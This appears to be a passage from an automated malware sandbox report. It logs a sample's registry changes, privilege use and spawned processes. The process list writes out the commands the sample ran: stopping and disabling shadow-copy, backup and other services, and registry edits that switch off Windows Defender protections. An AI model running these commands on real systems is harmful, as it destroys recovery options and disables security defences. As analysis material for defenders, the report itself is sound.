| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2329389628-4064185017-3901522362-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\InprocServer32\ThreadingModel = "Apartment" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon\htmlfile | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Old Icon | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\ = "[open(\"%1\")]" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000 | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\MSPUB.EXE\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\"" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shellex\IconHandler\ = "{42042206-2D85-11D3-8CFF-005004838597}" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.htm | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key deleted | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" /p %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe\" %1" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system" | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Runs net.exe
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe | N/A |
| N/A | N/A | C:\Windows\system32\msiexec.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\system32\wevtutil.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe
"C:\Users\Admin\AppData\Local\Temp\df2e56f50d123d406d20bf5f58924efcb6489aeba82d0cc11a2fd89b7c3f5687.exe"
C:\Windows\system32\net.exe
net.exe stop "NetMsmqActivator" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "NetMsmqActivator" /y
C:\Windows\system32\net.exe
net.exe stop "SamSs" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SamSs" /y
C:\Windows\system32\net.exe
net.exe stop "SDRSVC" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SDRSVC" /y
C:\Windows\system32\net.exe
net.exe stop "SstpSvc" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc" /y
C:\Windows\system32\net.exe
net.exe stop "UI0Detect" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect" /y
C:\Windows\system32\net.exe
net.exe stop "VSS" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VSS" /y
C:\Windows\system32\net.exe
net.exe stop "wbengine" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "wbengine" /y
C:\Windows\system32\net.exe
net.exe stop "WebClient" /y
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "WebClient" /y
C:\Windows\system32\sc.exe
sc.exe config "NetMsmqActivator" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SamSs" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SDRSVC" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "SstpSvc" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "UI0Detect" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "VSS" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "wbengine" start= disabled
C:\Windows\system32\sc.exe
sc.exe config "WebClient" start= disabled
C:\Windows\system32\reg.exe
reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
C:\Windows\system32\reg.exe
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
C:\Windows\system32\reg.exe
